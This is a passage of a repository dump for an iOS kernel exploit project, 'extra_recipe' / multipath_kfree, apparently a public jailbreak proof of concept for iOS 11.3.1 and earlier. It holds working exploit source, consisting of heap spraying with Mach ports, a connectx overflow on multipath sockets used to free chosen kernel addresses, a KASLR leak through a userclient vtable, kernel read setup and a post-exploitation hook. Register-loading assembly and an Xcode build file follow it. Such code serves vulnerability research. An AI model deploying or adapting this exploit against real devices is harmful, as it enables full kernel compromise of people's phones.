int mp_socks[MP_SOCK_COUNT];\n int prealloc_size = 0x660; // kalloc.4096\n int found = 0;\n int peeks = 0;\n \n for (int i = 0; i < 10000; ++i){\n prealloc_port(prealloc_size);\n }\n \n for (int i = 0; i < 0x20; ++i) {\n first_ports[i] = prealloc_port(prealloc_size);\n }\n \n mp_socks[0] = socket(39, SOCK_STREAM, 0);\n \n // multipath_kfree(mp_sock, 0xffffffff41414141); for (;;) sleep(1); // uncomment for basic POC\n\n for (int i = 0x20; i < FIRST_PORTS_COUNT; ++i) {\n first_ports[i] = prealloc_port(prealloc_size);\n }\n \n for (int i = 1; i < MP_SOCK_COUNT; ++i) {\n mp_socks[i] = socket(39, SOCK_STREAM, 0);\n }\n \n for (int i = 0; i < FIRST_PORTS_COUNT; ++i) {\n _init_port_with_empty_msg(first_ports[i]);\n }\n \n multipath_kfree_nearby_self(mp_socks[0], 0x0000 + 0x7a0);\n multipath_kfree_nearby_self(mp_socks[3], 0xe000 + 0x7a0);\n\n for (peeks = 0; peeks < MAX_PEEKS; ++peeks) {\n for (int i = 0 ; i < FIRST_PORTS_COUNT; ++i) {\n if (_is_port_corrupt(first_ports[i])) {\n corrupt_port = first_ports[i];\n printf(\"Corrupt port: %08X %d\\n\", corrupt_port, i);\n found = 1;\n break;\n }\n }\n \n if (found)\n break;\n }\n \n if (peeks >= MAX_PEEKS) {\n printf(\"Didn't find corrupt port\");\n sleep(1);\n exit(0);\n }\n \n for (int i = 0; i < REFILL_PORTS_COUNT; ++i) {\n refill_ports[i] = prealloc_port(prealloc_size);\n }\n \n for (int i = 0; i < REFILL_PORTS_COUNT; ++i) {\n _init_port_with_empty_msg(refill_ports[i]);\n }\n\n recv_buf = (uint8_t *)receive_prealloc_msg(corrupt_port);\n \n contained_port_addr = *(uint64_t *)(recv_buf + 0x1C);\n printf(\"refill port is at %p\\n\", (void *)contained_port_addr);\n \n memset(send_buf, 0, sizeof(send_buf));\n send_prealloc_msg(corrupt_port, (uint64_t *)send_buf, 30);\n \n multipath_kfree(contained_port_addr);\n \n for (;;) {\n if (_is_port_corrupt(corrupt_port)) {\n break;\n }\n }\n \n for (int i = 0; i < REFILL_USERCLIENTS_COUNT; ++i) {\n refill_userclients[i] = alloc_userclient();\n }\n \n recv_buf = (uint8_t *)receive_prealloc_msg(corrupt_port);\n \n uint64_t vtable = *(uint64_t *)(recv_buf + 0x14);\n uint64_t kaslr_shift = vtable - 0xfffffff006fdd978;\n printf(\"AGXCommandQueue vtable: %p\\n\", (void *)vtable);\n printf(\"kaslr shift: %p\\n\", (void *)kaslr_shift);\n \n // Out of everything not done properly in this POC, this is\n // not done properly the most\n mach_port_destroy(mach_task_self(), corrupt_port);\n for (int i = 0; i < TOOLAZY_PORTS_COUNT; ++i) {\n toolazy_ports[i] = prealloc_port(prealloc_size-0x28); // Not even really aligned because lazy\n }\n\n kx_setup(refill_userclients, toolazy_ports, kaslr_shift, contained_port_addr);\n \n uint64_t kernel_base = 0xfffffff007004000 + kaslr_shift;\n uint32_t val = kread32(kernel_base);\n \n printf(\"kernelbase DWORD: %08X\\n\", val);\n \n post_exploitation(kernel_base, kaslr_shift);\n \n printf(\"Done\\n\");\n for (;;)\n sleep(1);\n}\n" }, { "path": "extra_recipe/jailbreak.h", "content": "//\n// jailbreak.h\n// multipath_kfree\n//\n// Created by John Åkerblom on 6/1/18.\n//\n\n#ifndef jailbreak_h\n#define jailbreak_h\n\nvoid jb_go(void);\n\n#endif /* jailbreak_h */\n" }, { "path": "extra_recipe/load_regs_and_crash.s", "content": "; This code is lifted from extra_recipe by Ian Beer of Google Project Zero:\n.text\n.globl _load_regs_and_crash\n.align 2\n_load_regs_and_crash:\nmov x30, x0\nldp x0, x1, [x30, 0]\nldp x2, x3, [x30, 0x10]\nldp x4, x5, [x30, 0x20]\nldp x6, x7, [x30, 0x30]\nldp x8, x9, [x30, 0x40]\nldp x10, x11, [x30, 0x50]\nldp x12, x13, [x30, 0x60]\nldp x14, x15, [x30, 0x70]\nldp x16, x17, [x30, 0x80]\nldp x18, x19, [x30, 0x90]\nldp x20, x21, [x30, 0xa0]\nldp x22, x23, [x30, 0xb0]\nldp x24, x25, [x30, 0xc0]\nldp x26, x27, [x30, 0xd0]\nldp x28, x29, [x30, 0xe0]\nbrk 0\n.align 3\n" }, { "path": "extra_recipe/main.m", "content": "//\n// main.m\n// multipath_kfree\n//\n// Created by q on 6/1/18.\n// Copyright © 2018 kjljkla. All rights reserved.\n//\n\n#import \n#import \"AppDelegate.h\"\n\nint main(int argc, char * argv[]) {\n @autoreleasepool {\n return UIApplicationMain(argc, argv, nil, NSStringFromClass([AppDelegate class]));\n }\n}\n" }, { "path": "extra_recipe/multipath_kfree.c", "content": "//\n// multipath_kfree.h\n// multipath_kfree\n//\n// Created by John Åkerblom on 6/1/18.\n//\n\n#include \"multipath_kfree.h\"\n\n#include \n#include \n#include \n#include \n#include \n#include \n\n#ifndef AF_MULTIPATH\n#define AF_MULTIPATH 39\n#endif\n\n#define MULTIPATH_ERRNO_CHECK // Enable rudimentary error checking. Not thread-safe.\n#ifdef MULTIPATH_ERRNO_CHECK\n#include \n#endif\n\n#pragma pack(push, 1)\nstruct not_todescos_not_essers_ipc_object\n{\n uint8_t zeroes[132-88]; // Unused by us\n uint32_t mpte_itfinfo_size; // If > 4, ->mpte_itfinfo free'd\n uint8_t nonzeroes[168-136]; // Unused by us\n uint8_t nonzeroes2[16]; // Unused by us\n uint64_t mpte_itfinfo; // Address to free\n};\n#pragma pack(pop)\n\nstatic void _multipath_connectx_overflow(int sock, void *buf, size_t n)\n{\n struct sockaddr_in *sa_dst = calloc(1, 0x4000);\n memset(sa_dst, 0x0, 0x4000);\n memcpy(sa_dst, buf, n);\n sa_dst->sin_family = AF_UNSPEC;\n sa_dst->sin_len = n;\n \n struct sockaddr_in sa_src;\n memset(&sa_src, 0, sizeof(sa_src));\n sa_src.sin_family = AF_INET;\n sa_src.sin_len = 255;\n \n sa_endpoints_t sae;\n sae.sae_srcif = 0;\n sae.sae_srcaddr = (struct sockaddr *)&sa_src;\n sae.sae_srcaddrlen = 255;\n sae.sae_dstaddr = (struct sockaddr *)sa_dst;\n sae.sae_dstaddrlen = (socklen_t)n;\n \n#ifdef MULTIPATH_ERRNO_CHECK\n errno = 0;\n#endif\n \n // Trigger overflow\n connectx(sock, &sae, SAE_ASSOCID_ANY, 0, NULL, 0, NULL, NULL);\n \n // We expect return value -1, errno 22 on success (but they don't guarantee it)\n \n#ifdef MULTIPATH_ERRNO_CHECK\n if (errno == 1) {\n // Protip: Apple actually charges more than $100 for some regions (RIP 1000 SEK)\n *(int *)(\"You\") = (int)\"need to pay Apple $100 (add the multipath entitlement)\";\n }\n else if (errno == 47) {\n *(int *)(\"You\") = (int)\"need to find another bug (iOS <= 11.3.1 only)\";\n }\n#endif\n \n free(sa_dst);\n}\n\nstatic void _multipath_kfree(int sock, uint64_t addr, size_t addr_size)\n{\n struct not_todescos_not_essers_ipc_object s;\n memset(&s, 0x00, sizeof(s));\n memset(&s.nonzeroes, 0x42, sizeof(s.nonzeroes));\n //memset(&_s1.nonzeroes2, 0x42, sizeof (_s.nonzeroes2)); // Irrelevant\n s.mpte_itfinfo_size = 8; // > 4\n s.mpte_itfinfo = addr; // Address to free\n \n _multipath_connectx_overflow(sock, &s, sizeof(s) - sizeof(s.mpte_itfinfo) + addr_size);\n \n // Close for cleanup by GC\n close(sock);\n}\n\n/* multipath_kfree: cause GC to free a kernel address. */\nvoid multipath_kfree(uint64_t addr)\n{\n int mp_sock = socket(AF_MULTIPATH, SOCK_STREAM, 0);\n _multipath_kfree(mp_sock, addr, sizeof(addr));\n}\n\n/* multipath_kfree_nearby_self: cause GC to free a \"nearby\" kernel address.\n NOTE: closes mp_sock */\nvoid multipath_kfree_nearby_self(int mp_sock, uint16_t addr_lowest_part)\n{\n _multipath_kfree(mp_sock, addr_lowest_part, sizeof(addr_lowest_part));\n}\n" }, { "path": "extra_recipe/multipath_kfree.h", "content": "//\n// multipath_kfree.c\n// multipath_kfree\n//\n// Created by John Åkerblom on 6/1/18.\n//\n\n#include \n\n#ifndef multipath_kfree_h\n#define multipath_kfree_h\n\n/* multipath_kfree: cause GC to free a kernel address. */\nvoid multipath_kfree(uint64_t addr);\n\n/* multipath_kfree_nearby_self: cause GC to free a \"nearby\" kernel address.\n NOTE: closes mp_sock */\nvoid multipath_kfree_nearby_self(int mp_sock, uint16_t addr_lowest_part);\n\n#endif\n" }, { "path": "extra_recipe_extra_extra_bug.xcodeproj/project.pbxproj", "content": "// !$*UTF8*$!\n{\n\tarchiveVersion = 1;\n\tclasses = {\n\t};\n\tobjectVersion = 46;\n\tobjects = {\n\n/* Begin PBXBuildFile section */\n\t\t12242AA520C1BAF400B28377 /* multipath_kfree.c in Sources */ = {isa = PBXBuildFile; fileRef = 12242AA120C1BAF300B28377 /* multipath_kfree.c */; };\n\t\t12242AA620C1BAF400B28377 /* extra_recipe_utils.c in Sources */ = {isa = PBXBuildFile; fileRef = 12242AA220C1BAF300B28377 /* extra_recipe_utils.c */; };\n\t\t1260990B20C2C9680095B5C1 /* sha256.o in Frameworks */ = {isa = PBXBuildFile; fileRef = 1260990820C2C9670095B5C1 /* sha256.o */; };\n\t\t1260990C20C2C9680095B5C1 /* qilin_tfp0less.o in Frameworks */ = {isa = PBXBuildFile; fileRef = 1260990920C2C9670095B5C1 /* qilin_tfp0less.o */; };\n\t\t1260990D20C2C9680095B5C1 /* sha1.o in Frameworks */ = {isa = PBXBuildFile; fileRef = 1260990A20C2C9670095B5C1 /* sha1.o */; };\n\t\tB0E5165B1E39459300CE4C47 /* README in Resources */ = {isa = PBXBuildFile; fileRef = B0E5165A1E39459300CE4C47 /* README */; };\n\t\tB0F37BC11E361EAE00179E85 /* AppDelegate.swift in Sources */ = {isa = PBXBuildFile; fileRef = B0F37BC01E361EAE00179E85 /* AppDelegate.swift */; };\n\t\tB0F37BC31E361EAE00179E85 /* ViewController.swift in Sources */ = {isa = PBXBuildFile; fileRef = B0F37BC21E361EAE00179E85 /* ViewController.swift */; };\n\t\tB0F37BC61E361EAE00179E85 /* Main.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = B0F37BC41E361EAE00179E85 /* Main.storyboard */; };\n\t\tB0F37BC81E361EAE00179E85 /* Assets.xcassets in Resources */ = {isa = PBXBuildFile; fileRef = B0F37BC71E361EAE00179E85 /* Assets.xcassets */; };\n\t\tB0F37BCB1E361EAE00179E85 /* LaunchScreen.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = B0F37BC91E361EAE00179E85 /* LaunchScreen.storyboard */; };\n\t\tB0F37BD51E361FCC00179E85 /* jailbreak.c in Sources */ = {isa = PBXBuildFile; fileRef = B0F37BD31E361FCC00179E85 /* jailbreak.c */; };\n\t\tB0F37BDE1E37AC0700179E85 /* load_regs_and_crash.s in Sources */ = {isa = PBXBuildFile; fileRef = B0F37BDD1E37AC0700179E85 /* load_regs_and_crash.s */; };\n/* End PBXBuildFile section */\n\n/* Begin PBXFileReference section */\n\t\t12242A8A20C1B84900B28377 /* extra_recipe.entitlements */ = {isa = PBXFileReference; lastKnownFileType = text.plist.entitlements; path = extra_recipe.entitlements; sourceTree = \"\"; };\n\t\t12242AA120C1BAF300B28377 /* multipath_kfree.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = multipath_kfree.c; sourceTree = \"\"; };\n\t\t12242AA220C1BAF300B28377 /* extra_recipe_utils.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = extra_recipe_utils.c; sourceTree = \"\"; };\n\t\t12242AA320C1BAF300B28377 /* extra_recipe_utils.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = extra_recipe_utils.h; sourceTree = \"\"; };\n\t\t12242AA420C1BAF300B28377 /* multipath_kfree.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = multipath_kfree.h; sourceTree = \"\"; };\n\t\t1260990720C2C9670095B5C1 /* QiLin.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = QiLin.h; sourceTree = \"\"; };\n\t\t1260990820C2C9670095B5C1 /* sha256.o */ = {isa = PBXFileReference; lastKnownFileType = \"compiled.mach-o.objfile\"; path = sha256.o; sourceTree = \"\"; };\n\t\t1260990920C2C9670095B5C1 /* qilin_tfp0less.o */ = {isa = PBXFileReference; lastKnownFileType = \"compiled.mach-o.objfile\"; path = qilin_tfp0less.o; sourceTree = \"\"; };\n\t\t1260990A20C2C9670095B5C1 /* sha1.o */ = {isa = PBXFileReference; lastKnownFileType = \"compiled.mach-o.objfile\"; path = sha1.o; sourceTree = \"\"; };\n\t\tB0E5165A1E39459300CE4C47 /* README */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = text; path = README; sourceTree = \"\"; };\n\t\tB0F37BBD1E361EAE00179E85 /* extra_recipe.app */ = {isa = PBXFileReference; explicitFileType = wrapper.application; includeInIndex = 0; path = extra_recipe.app; sourceTree = BUILT_PRODUCTS_DIR; };\n\t\tB0F37BC01E361EAE00179E85 /* AppDelegate.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = AppDelegate.swift; sourceTree = \"\"; };\n\t\tB0F37BC21E361EAE00179E85 /* ViewController.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = ViewController.swift; sourceTree = \"\"; };\n\t\tB0F37BC51E361EAE00179E85 /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/Main.storyboard; sourceTree = \"\"; };\n\t\tB0F37BC71E361EAE00179E85 /* Assets.xcassets */ = {isa = PBXFileReference; lastKnownFileType = folder.assetcatalog; path = Assets.xcassets; sourceTree = \"\"; };\n\t\tB0F37BCA1E361EAE00179E85 /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/LaunchScreen.storyboard; sourceTree = \"\"; };\n\t\tB0F37BCC1E361EAE00179E85 /* Info.plist */ = {isa = PBXFileReference; lastKnownFileType = text.plist.xml; path = Info.plist; sourceTree = \"\"; };\n\t\tB0F37BD21E361FCC00179E85 /* extra_recipe-Bridging-Header.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = \"extra_recipe-Bridging-Header.h\"; sourceTree = \"\"; };\n\t\tB0F37BD31E361FCC00179E85 /* jailbreak.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = jailbreak.c; sourceTree = \"\"; };\n\t\tB0F37BDD1E37AC0700179E85 /* load_regs_and_crash.s */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.asm; path = load_regs_and_crash.s; sourceTree = \"\"; };\n/* End PBXFileReference section */\n\n/* Begin PBXFrameworksBuildPhase section */\n\t\tB0F37BBA1E361EAD00179E85 /* Frameworks */ = {\n\t\t\tisa = PBXFrameworksBuildPhase;\n\t\t\tbuildActionMask = 2147483647;\n\t\t\tfiles = (\n\t\t\t\t1260990D20C2C9680095B5C1 /* sha1.o in Frameworks */,\n\t\t\t\t1260990C20C2C9680095B5C1 /* qilin_tfp0less.o in Frameworks */,\n\t\t\t\t1260990B20C2C9680095B5C1 /* sha256.o in Frameworks */,\n\t\t\t);\n\t\t\trunOnlyForDeploymentPostprocessing = 0;\n\t\t};\n/* End PBXFrameworksBuildPhase section */\n\n/* Begin PBXGroup section */\n\t\tB0F37BB41E361EAD00179E85 = {\n\t\t\tisa = PBXGroup;\n\t\t\tchildren = (\n\t\t\t\tB0F37BBF1E361EAE00179E85 /* extra_recipe */,\n\t\t\t\tB0F37BBE1E361EAE00179E85 /* Products */,\n\t\t\t);\n\t\t\tsourceTree = \"\";\n\t\t};\n\t\tB0F37BBE1E361EAE00179E85 /* Products */ = {\n\t\t\tisa = PBXGroup;\n\t\t\tchildren = (\n\t\t\t\tB0F37BBD1E361EAE00179E85 /* extra_recipe.app */,\n\t\t\t);\n\t\t\tname = Products;\n\t\t\tsourceTree = \"\";\n\t\t};\n\t\tB0F37BBF1E361EAE00179E85 /* extra_recipe */ = {\n\t\t\tisa = PBXGroup;\n\t\t\tchildren = (\n\t\t\t\t12242A8A20C1B84900B28377 /* extra_recipe.entitlements */,\n\t\t\t\tB0F37BC01E361EAE00179E85 /* AppDelegate.swift */,\n\t\t\t\tB0F37BC21E361EAE00179E85 /* ViewController.swift */,\n\t\t\t\tB0F37BC41E361EAE00179E85 /* Main.storyboard */,\n\t\t\t\tB0F37BC71E361EAE00179E85 /* Assets.xcassets */,\n\t\t\t\tB0F37BC91E361EAE00179E85 /* LaunchScreen.storyboard */,\n\t\t\t\tB0F37BCC1E361EAE00179E85 /* Info.plist */,\n\t\t\t\tB0F37BD31E361FCC00179E85 /* jailbreak.c */,\n\t\t\t\tB0F37BDD1E37AC0700179E85 /* load_regs_and_crash.s */,\n\t\t\t\tB0F37BD21E361FCC00179E85 /* extra_recipe-Bridging-Header.h */,\n\t\t\t\tB0E5165A1E39459300CE4C47 /* README */,\n\t\t\t\t12242AA220C1BAF300B28377 /* extra_recipe_utils.c */,\n\t\t\t\t12242AA320C1BAF300B28377 /* extra_recipe_utils.h */,\n\t\t\t\t12242AA120C1BAF300B28377 /* multipath_kfree.c */,\n\t\t\t\t12242AA420C1BAF300B28377 /* multipath_kfree.h */,\n\t\t\t\t1260990920C2C9670095B5C1 /* qilin_tfp0less.o */,\n\t\t\t\t1260990720C2C9670095B5C1 /* QiLin.h */,\n\t\t\t\t1260990A20C2C9670095B5C1 /* sha1.o */,\n\t\t\t\t1260990820C2C9670095B5C1 /* sha256.o */,\n\t\t\t);\n\t\t\tpath = extra_recipe;\n\t\t\tsourceTree = \"\";\n\t\t};\n/* End PBXGroup section */\n\n/* Begin PBXNativeTarget section */\n\t\tB0F37BBC1E361EAD00179E85 /* extra_recipe */ = {\n\t\t\tisa = PBXNativeTarget;\n\t\t\tbuildConfigurationList = B0F37BCF1E361EAE00179E85 /* Build configuration list for PBXNativeTarget \"extra_recipe\" */;\n\t\t\tbuildPhases = (\n\t\t\t\tB0F37BB91E361EAD00179E85 /* Sources */,\n\t\t\t\tB0F37BBA1E361EAD00179E85 /* Frameworks */,\n\t\t\t\tB0F37BBB1E361EAD00179E85 /* Resources */,\n\t\t\t);\n\t\t\tbuildRules = (\n\t\t\t);\n\t\t\tdependencies = (\n\t\t\t);\n\t\t\tname = extra_recipe;\n\t\t\tproductName = extra_recipe;\n\t\t\tproductReference = B0F37BBD1E361EAE00179E85 /* extra_recipe.app */;\n\t\t\tproductType = \"com.apple.product-type.application\";\n\t\t};\n/* End PBXNativeTarget section */\n\n/* Begin PBXProject section */\n\t\tB0F37BB51E361EAD00179E85 /* Project object */ = {\n\t\t\tisa = PBXProject;\n\t\t\tattributes = {\n\t\t\t\tLastSwiftUpdateCheck = 0810;\n\t\t\t\tLastUpgradeCheck = 0810;\n\t\t\t\tORGANIZATIONNAME = \"Ian Beer\";\n\t\t\t\tTargetAttributes = {\n\t\t\t\t\tB0F37BBC1E361EAD00179E85 = {\n\t\t\t\t\t\tCreatedOnToolsVersion = 8.1;\n\t\t\t\t\t\tDevelopmentTeam = 854G7LGZ42;\n\t\t\t\t\t\tLastSwiftMigration = 0810;\n\t\t\t\t\t\tProvisioningStyle = Automatic;\n\t\t\t\t\t\tSystemCapabilities = {\n\t\t\t\t\t\t\tcom.apple.Multipath = {\n\t\t\t\t\t\t\t\tenabled = 1;\n\t\t\t\t\t\t\t};\n\t\t\t\t\t\t};\n\t\t\t\t\t};\n\t\t\t\t};\n\t\t\t};\n\t\t\tbuildConfigurationList = B0F37BB81E361EAD00179E85 /* Build configuration list for PBXProject \"extra_recipe_extra_extra_bug\" */;\n\t\t\tcompatibilityVersion = \"Xcode 3.2\";\n\t\t\tdevelopmentRegion = English;\n\t\t\thasScannedForEncodings = 0;\n\t\t\tknownRegions = (\n\t\t\t\ten,\n\t\t\t\tBase,\n\t\t\t);\n\t\t\tmainGroup = B0F37BB41E361EAD00179E85;\n\t\t\tproductRefGroup = B0F37BBE1E361EAE00179E85 /* Products */;\n\t\t\tprojectDirPath = \"\";\n\t\t\tprojectRoot = \"\";\n\t\t\ttargets = (\n\t\t\t\tB0F37BBC1E361EAD00179E85 /* extra_recipe */,\n\t\t\t);\n\t\t};\n/* End PBXProject section */\n\n/* Begin PBXResourcesBuildPhase section */\n\t\tB0F37BBB1E361EAD00179E85 /* Resources */ = {\n\t\t\tisa = PBXResourcesBuildPhase;\n\t\t\tbuildActionMask = 2147483647;\n\t\t\tfiles = (\n\t\t\t\tB0E5165B1E39459300CE4C47 /* README in Resources */,\n\t\t\t\tB0F37BCB1E361EAE00179E85 /* LaunchScreen.storyboard in Resources */,\n\t\t\t\tB0F37BC81E361EAE00179E85 /* Assets.xcassets in Resources */,\n\t\t\t\tB0F37BC61E361EAE00179E85 /* Main.storyboard in Resources */,\n\t\t\t);\n\t\t\trunOnlyForDeploymentPostprocessing = 0;\n\t\t};\n/* End PBXResourcesBuildPhase section */\n\n/* Begin PBXSourcesBuildPhase section */\n\t\tB0F37BB91E361EAD00179E85 /* Sources */ = {\n\t\t\tisa = PBXSourcesBuildPhase;\n\t\t\tbuildActionMask = 2147483647;\n\t\t\tfiles = (\n\t\t\t\t12242AA620C1BAF400B28377 /* extra_recipe_utils.c in Sources */,\n\t\t\t\tB0F37BDE1E37AC0700179E85 /* load_regs_and_crash.s in Sources */,\n\t\t\t\tB0F37BD51E361FCC00179E85 /* jailbreak.c in Sources */,\n\t\t\t\t12242AA520C1BAF400B28377 /* multipath_kfree.c in Sources */,\n\t\t\t\tB0F37BC31E361EAE00179E85 /* ViewController.swift in Sources */,\n\t\t\t\tB0F37BC11E361EAE00179E85 /* AppDelegate.swift in Sources */,\n\t\t\t);\n\t\t\trunOnlyForDeploymentPostprocessing = 0;\n\t\t};\n/* End PBXSourcesBuildPhase section */\n\n/* Begin PBXVariantGroup section */\n\t\tB0F37BC41E361EAE00179E85 /* Main.storyboard */ = {\n\t\t\tisa = PBXVariantGroup;\n\t\t\tchildren = (\n\t\t\t\tB0F37BC51E361EAE00179E85 /* Base */,\n\t\t\t);\n\t\t\tname = Main.storyboard;\n\t\t\tsourceTree = \"\";\n\t\t};\n\t\tB0F37BC91E361EAE00179E85 /* LaunchScreen.storyboard */ = {\n\t\t\tisa = PBXVariantGroup;\n\t\t\tchildren = (\n\t\t\t\tB0F37BCA1E361EAE00179E85 /* Base */,\n\t\t\t);\n\t\t\tname = LaunchScreen.storyboard;\n\t\t\tsourceTree = \"\";\n\t\t};\n/* End PBXVariantGroup section */\n\n/* Begin XCBuildConfiguration section */\n\t\tB0F37BCD1E361EAE00179E85 /* Debug */ = {\n\t\t\tisa = XCBuildConfiguration;\n\t\t\tbuildSettings = {\n\t\t\t\tALWAYS_SEARCH_USER_PATHS = NO;\n\t\t\t\tARCHS = \"$(ARCHS_STANDARD)\";\n\t\t\t\tCLANG_ANALYZER_NONNULL = YES;\n\t\t\t\tCLANG_CXX_LANGUAGE_STANDARD = \"gnu++0x\";\n\t\t\t\tCLANG_CXX_LIBRARY = \"libc++\";\n\t\t\t\tCLANG_ENABLE_MODULES = YES;\n\t\t\t\tCLANG_ENABLE_OBJC_ARC = YES;\n\t\t\t\tCLANG_WARN_BOOL_CONVERSION = YES;\n\t\t\t\tCLANG_WARN_CONSTANT_CONVERSION = YES;\n\t\t\t\tCLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR;\n\t\t\t\tCLANG_WARN_DOCUMENTATION_COMMENTS = YES;\n\t\t\t\tCLANG_WARN_EMPTY_BODY = YES;\n\t\t\t\tCLANG_WARN_ENUM_CONVERSION = YES;\n\t\t\t\tCLANG_WARN_INFINITE_RECURSION = YES;\n\t\t\t\tCLANG_WARN_INT_CONVERSION = YES;\n\t\t\t\tCLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR;\n\t\t\t\tCLANG_WARN_SUSPICIOUS_MOVES = YES;\n\t\t\t\tCLANG_WARN_UNREACHABLE_CODE = YES;\n\t\t\t\tCLANG_WARN__DUPLICATE_METHOD_MATCH = YES;\n\t\t\t\t\"CODE_SIGN_IDENTITY[sdk=iphoneos*]\" = \"iPhone Developer\";\n\t\t\t\tCOPY_PHASE_STRIP = NO;\n\t\t\t\tDEBUG_INFORMATION_FORMAT = dwarf;\n\t\t\t\tENABLE_BITCODE = NO;\n\t\t\t\tENABLE_STRICT_OBJC_MSGSEND = YES;\n\t\t\t\tENABLE_TESTABILITY = YES;\n\t\t\t\tGCC_C_LANGUAGE_STANDARD = gnu99;\n\t\t\t\tGCC_DYNAMIC_NO_PIC = NO;\n\t\t\t\tGCC_NO_COMMON_BLOCKS = YES;\n\t\t\t\tGCC_OPTIMIZATION_LEVEL = 0;\n\t\t\t\tGCC_PREPROCESSOR_DEFINITIONS = (\n\t\t\t\t\t\"DEBUG=1\",\n\t\t\t\t\t\"$(inherited)\",\n\t\t\t\t);\n\t\t\t\tGCC_WARN_64_TO_32_BIT_CONVERSION = YES;\n\t\t\t\tGCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR;\n\t\t\t\tGCC_WARN_UNDECLARED_SELECTOR = YES;\n\t\t\t\tGCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE;\n\t\t\t\tGCC_WARN_UNUSED_FUNCTION = YES;\n\t\t\t\tGCC_WARN_UNUSED_VARIABLE = YES;\n\t\t\t\tIPHONEOS_DEPLOYMENT_TARGET = 10.1;\n\t\t\t\tMTL_ENABLE_DEBUG_INFO = YES;\n\t\t\t\tONLY_ACTIVE_ARCH = YES;\n\t\t\t\tSDKROOT = iphoneos;\n\t\t\t\tSWIFT_ACTIVE_COMPILATION_CONDITIONS = DEBUG;\n\t\t\t\tSWIFT_OPTIMIZATION_LEVEL = \"-Onone\";\n\t\t\t\tTARGETED_DEVICE_FAMILY = \"1,2\";\n\t\t\t\tVALID_ARCHS = \"armv7 armv7s arm64\";\n\t\t\t};\n\t\t\tname = Debug;\n\t\t};\n\t\tB0F37BCE1E361EAE00179E85 /* Release */ = {\n\t\t\tisa = XCBuildConfiguration;\n\t\t\tbuildSettings = {\n\t\t\t\tALWAYS_SEARCH_USER_PATHS = NO;\n\t\t\t\tARCHS = \"$(ARCHS_STANDARD)\";\n\t\t\t\tCLANG_ANALYZER_NONNULL = YES;\n\t\t\t\tCLANG_CXX_LANGUAGE_STANDARD = \"gnu++0x\";\n\t\t\t\tCLANG_CXX_LIBRARY = \"libc++\";\n\t\t\t\tCLANG_ENABLE_MODULES = YES;\n\t\t\t\tCLANG_ENABLE_OBJC_ARC = YES;\n\t\t\t\tCLANG_WARN_BOOL_CONVERSION = YES;\n\t\t\t\tCLANG_WARN_CONSTANT_CONVERSION = YES;\n\t\t\t\tCLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR;\n\t\t\t\tCLANG_WARN_DOCUMENTATION_COMMENTS = YES;\n\t\t\t\tCLANG_WARN_EMPTY_BODY = YES;\n\t\t\t\tCLANG_WARN_ENUM_CONVERSION = YES;\n\t\t\t\tCLANG_WARN_INFINITE_RECURSION = YES;\n\t\t\t\tCLANG_WARN_INT_CONVERSION = YES;\n\t\t\t\tCLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR;\n\t\t\t\tCLANG_WARN_SUSPICIOUS_MOVES = YES;\n\t\t\t\tCLANG_WARN_UNREACHABLE_CODE = YES;\n\t\t\t\tCLANG_WARN__DUPLICATE_METHOD_MATCH = YES;\n\t\t\t\t\"CODE_SIGN_IDENTITY[sdk=iphoneos*]\" = \"iPhone Developer\";\n\t\t\t\tCOPY_PHASE_STRIP = NO;\n\t\t\t\tDEBUG_INFORMATION_FORMAT = \"dwarf-with-dsym\";\n\t\t\t\tENABLE_BITCODE = NO;\n\t\t\t\tENABLE_NS_ASSERTIONS = NO;\n\t\t\t\tENABLE_STRICT_OBJC_MSGSEND = YES;\n\t\t\t\tGCC_C_LANGUAGE_STANDARD = gnu99;\n\t\t\t\tGCC_NO_COMMON_BLOCKS = YES;\n\t\t\t\tGCC_OPTIMIZATION_LEVEL = 0;\n\t\t\t\tGCC_WARN_64_TO_32_BIT_CONVERSION = YES;\n\t\t\t\tGCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR;\n\t\t\t\tGCC_WARN_UNDECLARED_SELECTOR = YES;\n\t\t\t\tGCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE;\n\t\t\t\tGCC_WARN_UNUSED_FUNCTION = YES;\n\t\t\t\tGCC_WARN_UNUSED_VARIABLE = YES;\n\t\t\t\tIPHONEOS_DEPLOYMENT_TARGET = 10.1;\n\t\t\t\tMTL_ENABLE_DEBUG_INFO = NO;\n\t\t\t\tSDKROOT = iphoneos;\n\t\t\t\tSWIFT_OPTIMIZATION_LEVEL = \"-Owholemodule\";\n\t\t\t\tTARGETED_DEVICE_FAMILY = \"1,2\";\n\t\t\t\tVALIDATE_PRODUCT = YES;\n\t\t\t\tVALID_ARCHS = \"armv7 armv7s arm64\";\n\t\t\t};\n\t\t\tname = Release;\n\t\t};\n\t\tB0F37BD01E361EAE00179E85 /* Debug */ = {\n\t\t\tisa = XCBuildConfiguration;\n\t\t\tbuildSettings = {\n\t\t\t\tASSETCATALOG_COMPILER_APPICON_NAME = AppIcon;\n\t\t\t\tCLANG_ENABLE_MODULES = YES;\n\t\t\t\tCODE_SIGN_ENTITLEMENTS = extra_recipe/extra_recipe.entitlements;\n\t\t\t\tDEVELOPMENT_TEAM = 